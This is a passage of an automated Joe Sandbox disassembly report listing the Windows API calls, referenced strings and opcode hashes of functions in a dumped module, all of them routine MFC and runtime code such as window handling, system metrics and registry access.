                            • Part of subcall function 6FD0815A: GetLastActivePopup.USER32(?), ref: 6FD081BF
                            • Part of subcall function 6FD0815A: IsWindowEnabled.USER32(?), ref: 6FD081D3
                            • Part of subcall function 6FD0815A: EnableWindow.USER32(?,00000000), ref: 6FD081E6
                          • EnableWindow.USER32(?,00000001), ref: 6FD08247
                          • GetWindowThreadProcessId.USER32(?,?), ref: 6FD0825B
                          • GetCurrentProcessId.KERNEL32(?,?), ref: 6FD08265
                          • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 6FD0827D
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?), ref: 6FD082F9
                          • EnableWindow.USER32(00000000,00000001), ref: 6FD08340
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                          • String ID: 0
                          • API String ID: 1877664794-4108050209
                          • Opcode ID: 0f098abe976199940c5c06d004c0d268874b421f5c708756b657cf60685a1e37
                          • Instruction ID: b4e2513db3ba87d0ce1991d628b6fae4397c09000753b19287951e7f6be0c650
                          • Opcode Fuzzy Hash: 0f098abe976199940c5c06d004c0d268874b421f5c708756b657cf60685a1e37
                          • Instruction Fuzzy Hash: 5D419372A45719DBDB90EF74CC88BDAB7B4FF55310F140599E914E6180D770F9908B90
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 6FD0DED6
                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 6FD0DF00
                          • GetSystemMetrics.USER32(00000000), ref: 6FD0DF17
                          • GetSystemMetrics.USER32(00000001), ref: 6FD0DF1E
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 6FD0DF49
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                          • String ID: B$DISPLAY
                          • API String ID: 381819527-3316187204
                          • Opcode ID: a0e6617b1e7aa37b5bdd75c5fa8fa9fce00ce6df2e578f4a78a3e3e2b872f9fd
                          • Instruction ID: af7976411add31584e733e3bc13537ff410e7f0145d9dd1d73206358895e4d18
                          • Opcode Fuzzy Hash: a0e6617b1e7aa37b5bdd75c5fa8fa9fce00ce6df2e578f4a78a3e3e2b872f9fd
                          • Instruction Fuzzy Hash: 1721A771508720EBEF50AF148C84A5B7BAAEF46760F158217FE189A184DEB1F440CBE1
                          APIs
                          • GetSystemMetrics.USER32(0000000B), ref: 6FD0CD75
                          • GetSystemMetrics.USER32(0000000C), ref: 6FD0CD7C
                          • GetSystemMetrics.USER32(00000002), ref: 6FD0CD83
                          • GetSystemMetrics.USER32(00000003), ref: 6FD0CD8D
                          • GetDC.USER32(00000000), ref: 6FD0CD97
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 6FD0CDA8
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 6FD0CDB0
                          • ReleaseDC.USER32(00000000,00000000), ref: 6FD0CDB8
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: MetricsSystem$CapsDevice$Release
                          • String ID:
                          • API String ID: 1151147025-0
                          • Opcode ID: e903bc0b1ed7ceddcd40dd5f9cb102ed4fd659b18bafef723e637ee15ca408ee
                          • Instruction ID: dccdbcf8306ac153a5b520e1fbb734e07fda899dd207a562dc1de9536160e383
                          • Opcode Fuzzy Hash: e903bc0b1ed7ceddcd40dd5f9cb102ed4fd659b18bafef723e637ee15ca408ee
                          • Instruction Fuzzy Hash: BEF01DB1E44B14BAFB106B728C89F167F68EB46771F088517E7059B2C0DAB5A8618FD0
                          APIs
                          • _memset.LIBCMT ref: 6FD1029B
                          • SendMessageW.USER32(00000000,00000433,00000000,?), ref: 6FD102C4
                          • GetWindowLongW.USER32(?,000000FC), ref: 6FD102D6
                          • GetWindowLongW.USER32(?,000000FC), ref: 6FD102E7
                          • SetWindowLongW.USER32(?,000000FC,?), ref: 6FD10303
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: LongWindow$MessageSend_memset
                          • String ID: ,
                          • API String ID: 2997958587-3772416878
                          • Opcode ID: cfec290b551505cd33e9f11fca3ebccbd31ba69a431b7346e77372cf86e6691a
                          • Instruction ID: ac98b628d03ab9711a09c95246fa957cd6e0706880a9c4d7c98f045c1b747be9
                          • Opcode Fuzzy Hash: cfec290b551505cd33e9f11fca3ebccbd31ba69a431b7346e77372cf86e6691a
                          • Instruction Fuzzy Hash: 7131EE30608700DFDB50FFB4E888A99BBB4BF49354B10122EE5559B691DB30F810CB90
                          APIs
                          • __EH_prolog3_GS.LIBCMT ref: 6FD0A20A
                          • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 6FD0A2F0
                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FD0A30D
                          • RegCloseKey.ADVAPI32(?), ref: 6FD0A32D
                          • RegQueryValueW.ADVAPI32(80000001,?,?,?), ref: 6FD0A348
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: CloseEnumH_prolog3_OpenQueryValue
                          • String ID: Software\
                          • API String ID: 1666054129-964853688
                          • Opcode ID: 6349ef520305642d0ae876f02bb8b23a36685bd40f81e81cc217521f849f1d23
                          • Instruction ID: 95c50418d06adb2a4857123ea346abc146aced4ae4b841dd44fb3ef3f4c65a97
                          • Opcode Fuzzy Hash: 6349ef520305642d0ae876f02bb8b23a36685bd40f81e81cc217521f849f1d23
                          • Instruction Fuzzy Hash: D841A331801619ABDB61FFA4DC88EDEB7B8AF49318F1402D9E105A2190DB34BB84DF60
                          APIs
                          • __EH_prolog3_catch_GS.LIBCMT ref: 6FD0A08C
                          • RegOpenKeyW.ADVAPI32(?,?,?), ref: 6FD0A11A
                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000104), ref: 6FD0A13D
                            • Part of subcall function 6FD0A02D: __EH_prolog3.LIBCMT ref: 6FD0A034
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: EnumH_prolog3H_prolog3_catch_Open
                          • String ID: Software\Classes\
                          • API String ID: 3518408925-1121929649
                          • Opcode ID: 71bfc604896d90f54abc834ba58c9b4f50e6b71d011ee8ece604a1593f5839ca
                          • Instruction ID: b731410efc3489f42a99278a523fc4e81608155a672c237608d87e31433930a4
                          • Opcode Fuzzy Hash: 71bfc604896d90f54abc834ba58c9b4f50e6b71d011ee8ece604a1593f5839ca
                          • Instruction Fuzzy Hash: 5C316032C04228AADB61AFA4DC48BDDB7B4AF09324F1402D5E95967290DB706F84DFA1
                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 6FD0D0AE
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FD0D0D1
                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 6FD0D0ED
                          • RegCloseKey.ADVAPI32(?), ref: 6FD0D0FD
                          • RegCloseKey.ADVAPI32(?), ref: 6FD0D107
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: CloseCreate$Open
                          • String ID: software
                          • API String ID: 1740278721-2010147023
                          • Opcode ID: 2e3eca0a2079ce632542d3fe3d1577611339bf679839b9952660e0d06ef98f08
                          • Instruction ID: 98d2ea82be79f9c950fb4e7a20c8eae978d3b0b60a635ca7fa28a24acacea048
                          • Opcode Fuzzy Hash: 2e3eca0a2079ce632542d3fe3d1577611339bf679839b9952660e0d06ef98f08
                          • Instruction Fuzzy Hash: E5111972D00119FBDB11DF8ACD88DDFBFBDEFC5750B10406AA604A2111DA30AA00EBA0
                          APIs
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6FD0BEB5
                          • __CxxThrowException@8.LIBCMT ref: 6FD0BEBF
                            • Part of subcall function 6FD1527B: RaiseException.KERNEL32(?,00000000,?,00000001), ref: 6FD152BD
                          • LocalReAlloc.KERNEL32(?,00000000,00000002,00000000,00000010,?,?,00000000,?,00000004,6FD0AF00,6FD06DDD,6FD068AD,?,6FD14902,?), ref: 6FD0BED6
                          • RtlLeaveCriticalSection.NTDLL(?), ref: 6FD0BEE3
                            • Part of subcall function 6FD06D89: __CxxThrowException@8.LIBCMT ref: 6FD06D9F
                          • _memset.LIBCMT ref: 6FD0BF02
                          • TlsSetValue.KERNEL32(?,00000000), ref: 6FD0BF13
                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6FD0BF34
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: CriticalLeaveSection$Exception@8Throw$AllocExceptionLocalRaiseValue_memset
                          • String ID:
                          • API String ID: 356813703-0
                          • Opcode ID: 28b8465cae00fe94caf2c4e2f129a066d6a4bc1b3cbb6f2e421c403d68531806
                          • Instruction ID: 3aa481b97e0a304584138a5bcb1d9679afc64ccd65318968b7988af031d1aa3a
                          • Opcode Fuzzy Hash: 28b8465cae00fe94caf2c4e2f129a066d6a4bc1b3cbb6f2e421c403d68531806
                          • Instruction Fuzzy Hash: F5118E75508605AFEB51EF64C885D2ABBB6FF01324710C52AE655969A0CB31BC60CFA0
                          APIs
                          • SetErrorMode.KERNEL32(00000000), ref: 6FD0CA85
                          • SetErrorMode.KERNEL32(00000000), ref: 6FD0CA8D
                            • Part of subcall function 6FD0A698: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 6FD0A6D0
                            • Part of subcall function 6FD0A698: SetLastError.KERNEL32(0000006F), ref: 6FD0A6E7
                          • GetModuleHandleW.KERNEL32(user32.dll), ref: 6FD0CADC
                          • GetProcAddress.KERNEL32(00000000,NotifyWinEvent), ref: 6FD0CAEC
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Error$ModeModule$AddressFileHandleLastNameProc
                          • String ID: NotifyWinEvent$user32.dll
                          • API String ID: 1146408833-597752486
                          • Opcode ID: 47956ad18a9bcbf1492bb9e3fe85148a706a527f68a9ace41a0983ce641ac442
                          • Instruction ID: fe9bbc84245ff55ffecf9d50719a6308459e720be6726dc45f0ba28b7af59113
                          • Opcode Fuzzy Hash: 47956ad18a9bcbf1492bb9e3fe85148a706a527f68a9ace41a0983ce641ac442
                          • Instruction Fuzzy Hash: 65018F72A043149FDB95FF65D844A5A3BE8AF45324B09805AFA45DB281DF31F840CFB6
                          APIs
                          • GetSysColor.USER32(0000000F), ref: 6FD0CD2E
                          • GetSysColor.USER32(00000010), ref: 6FD0CD35
                          • GetSysColor.USER32(00000014), ref: 6FD0CD3C
                          • GetSysColor.USER32(00000012), ref: 6FD0CD43
                          • GetSysColor.USER32(00000006), ref: 6FD0CD4A
                          • GetSysColorBrush.USER32(0000000F), ref: 6FD0CD57
                          • GetSysColorBrush.USER32(00000006), ref: 6FD0CD5E
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Color$Brush
                          • String ID:
                          • API String ID: 2798902688-0
                          • Opcode ID: 0c3e30cea5172b4b2e7922a8625d18c992065803800c063af39add1903620324
                          • Instruction ID: d8befd3e4dcb01ffcba0be8c4818313711f9477ec5d00ed0f40cb0f12c433bef
                          • Opcode Fuzzy Hash: 0c3e30cea5172b4b2e7922a8625d18c992065803800c063af39add1903620324
                          • Instruction Fuzzy Hash: 66F0FE719407445BEB30BB724949B47BAD1FFC4720F16092EE2458B990DAB6E441DF40
                          APIs
                          • GetWindowLongW.USER32(?,000000F0), ref: 6FD0818D
                          • GetParent.USER32(?), ref: 6FD0819B
                          • GetParent.USER32(?), ref: 6FD081AE
                          • GetLastActivePopup.USER32(?), ref: 6FD081BF
                          • IsWindowEnabled.USER32(?), ref: 6FD081D3
                          • EnableWindow.USER32(?,00000000), ref: 6FD081E6
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                          • String ID:
                          • API String ID: 670545878-0
                          • Opcode ID: 984ae9a89dd9b9d27c503086bd9b126f255ee40e5808255051ff3a5a48e8d7c9
                          • Instruction ID: 9a2f188a32a7e201a091a26ee8005258014a643103e84390e49e779601ce8ead
                          • Opcode Fuzzy Hash: 984ae9a89dd9b9d27c503086bd9b126f255ee40e5808255051ff3a5a48e8d7c9
                          • Instruction Fuzzy Hash: 7C11943360DB21EBE7913F698D80B9A76A8AF45B60F090116ED14EB240DB60F801C6D7
                          APIs
                          • __CreateFrameInfo.LIBCMT ref: 6FD1C43E
                            • Part of subcall function 6FD14FC4: __getptd.LIBCMT ref: 6FD14FD2
                            • Part of subcall function 6FD14FC4: __getptd.LIBCMT ref: 6FD14FE0
                          • __getptd.LIBCMT ref: 6FD1C448
                            • Part of subcall function 6FD1A27F: __getptd_noexit.LIBCMT ref: 6FD1A282
                            • Part of subcall function 6FD1A27F: __amsg_exit.LIBCMT ref: 6FD1A28F
                          • __getptd.LIBCMT ref: 6FD1C456
                          • __getptd.LIBCMT ref: 6FD1C464
                          • __getptd.LIBCMT ref: 6FD1C46F
                          • _CallCatchBlock2.LIBCMT ref: 6FD1C495
                            • Part of subcall function 6FD15069: __CallSettingFrame@12.LIBCMT ref: 6FD150B5
                            • Part of subcall function 6FD1C53C: __getptd.LIBCMT ref: 6FD1C54B
                            • Part of subcall function 6FD1C53C: __getptd.LIBCMT ref: 6FD1C559
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                          • String ID:
                          • API String ID: 1602911419-0
                          • Opcode ID: 4e54fc789c35e758ad6fb7f9b61c28a05e1a607a8f707d907668120aa7820e72
                          • Instruction ID: 2f79691e9f5e462525073f3a5257e1ca18991b0cd8b2bc87b365ca7f032a2ad9
                          • Opcode Fuzzy Hash: 4e54fc789c35e758ad6fb7f9b61c28a05e1a607a8f707d907668120aa7820e72
                          • Instruction Fuzzy Hash: 1311B2B1808309DFDF40DFA4E944AED7BB1BB18318F148569E814A7290EB39AA159B60
                          APIs
                          • ClientToScreen.USER32(?,?), ref: 6FD0DB6D
                          • GetDlgCtrlID.USER32(00000000), ref: 6FD0DB81
                          • GetWindowLongW.USER32(00000000,000000F0), ref: 6FD0DB91
                          • GetWindowRect.USER32(00000000,?), ref: 6FD0DBA3
                          • PtInRect.USER32(?,?,?), ref: 6FD0DBB3
                          • GetWindow.USER32(?,00000005), ref: 6FD0DBC0
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Window$Rect$ClientCtrlLongScreen
                          • String ID:
                          • API String ID: 1315500227-0
                          • Opcode ID: 9bbfd1e9cd8f53a1424a165eed4691eb23b98c1c7f367ef61fd7631bd5e21f42
                          • Instruction ID: f938a073a5bc284f6de4d42ebdca022460bc28ab8b87c6570bd20eac0788ed6a
                          • Opcode Fuzzy Hash: 9bbfd1e9cd8f53a1424a165eed4691eb23b98c1c7f367ef61fd7631bd5e21f42
                          • Instruction Fuzzy Hash: 0B012836104519ABEB517F648C48EAE3B7AEF46360B084122FA11E6090DB34F526CAE4
                          APIs
                          • GetMenuCheckMarkDimensions.USER32 ref: 6FD096F2
                          • _memset.LIBCMT ref: 6FD0976A
                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 6FD097CD
                          • LoadBitmapW.USER32(00000000,00007FE3), ref: 6FD097E5
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                          • String ID:
                          • API String ID: 4271682439-3916222277
                          • Opcode ID: 30109446478b14a350ab0bdee45002974b7d7e92d61d44d194ee0efe195dd5ce
                          • Instruction ID: 015061de914e731a8ca9567bd6b051d5dd5020719f9bca2468f9f36c46aab595
                          • Opcode Fuzzy Hash: 30109446478b14a350ab0bdee45002974b7d7e92d61d44d194ee0efe195dd5ce
                          • Instruction Fuzzy Hash: 12310572A00359DBEF209F288CC4B997BB5FB85354F5540A6E649EB2C1DF30B9858F60
                          APIs
                          • __getptd.LIBCMT ref: 6FD1C17F
                            • Part of subcall function 6FD1A27F: __getptd_noexit.LIBCMT ref: 6FD1A282
                            • Part of subcall function 6FD1A27F: __amsg_exit.LIBCMT ref: 6FD1A28F
                          • __getptd.LIBCMT ref: 6FD1C190
                          • __getptd.LIBCMT ref: 6FD1C19E
                          Strings
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: __getptd$__amsg_exit__getptd_noexit
                          • String ID: MOC$csm
                          • API String ID: 803148776-1389381023
                          • Opcode ID: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
                          • Instruction ID: 898a22dfb52825927d90ac8e0cc1272c17df05e468f5657b267a0540593ba305
                          • Opcode Fuzzy Hash: aa1837dadfba7e54d6be07239196d8ff6a1898bb90bdeee490b5edcfe485d706
                          • Instruction Fuzzy Hash: DBE04F3655C348CFE780DBB4E046B9837A4EB69318F1501F1D40CCB261D735F584D952
                          APIs
                          • lstrlenW.KERNEL32(?,?,?,?,?,6FD049D6,?,00000003), ref: 6FD05685
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,?,00000000,00000000), ref: 6FD056B4
                          • GetLastError.KERNEL32 ref: 6FD056C5
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000000,00000000,00000000), ref: 6FD056E5
                          • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000000,00000000,00000000), ref: 6FD05709
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD31000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970408215.000000006FD35000.00000004.00000001.01000000.0000000A.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_20_2_6fd00000_DZIPR.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$ErrorLastlstrlen
                          • String ID:
                          • API String ID: 3322701435-0
                          • Opcode ID: 7c810c3e47cb89bd09c08a4ec0705ea6b6d634a70f8b517a77f5a33592b4d9b6
                          • Instruction ID: ba7032564dbea18b77bcddee360f39c053c9f35070b629f8120ac208c612f2a6
                          • Opcode Fuzzy Hash: 7c810c3e47cb89bd09c08a4ec0705ea6b6d634a70f8b517a77f5a33592b4d9b6
                          • Instruction Fuzzy Hash: 86117F75384305ABE660EF68DCC5F6777ACEB85754F200929FA41972C0DA64BC098774
                          APIs
                          • lstrlenW.KERNEL32(?,?,?), ref: 6FD0DA3D
                          • _memset.LIBCMT ref: 6FD0DA5B
                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 6FD0DA75
                          • lstrcmpW.KERNEL32(?,?,?,?), ref: 6FD0DA87
                          • SetWindowTextW.USER32(00000000,?), ref: 6FD0DA93
                            • Part of subcall function 6FD06DC1: __CxxThrowException@8.LIBCMT ref: 6FD06DD7
                            • Part of subcall function 6FD06DC1: __EH_prolog3.LIBCMT ref: 6FD06DE4
                          Memory Dump Source
                          • Source File: 00000014.00000002.2970286122.000000006FD01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6FD00000, based on PE: true
                          • Associated: 00000014.00000002.2970269737.000000006FD00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                          • Associated: 00000014.00000002.2970379173.000000006FD28000.00000002.00000001.01000000.0000000A.sdmpDownload File
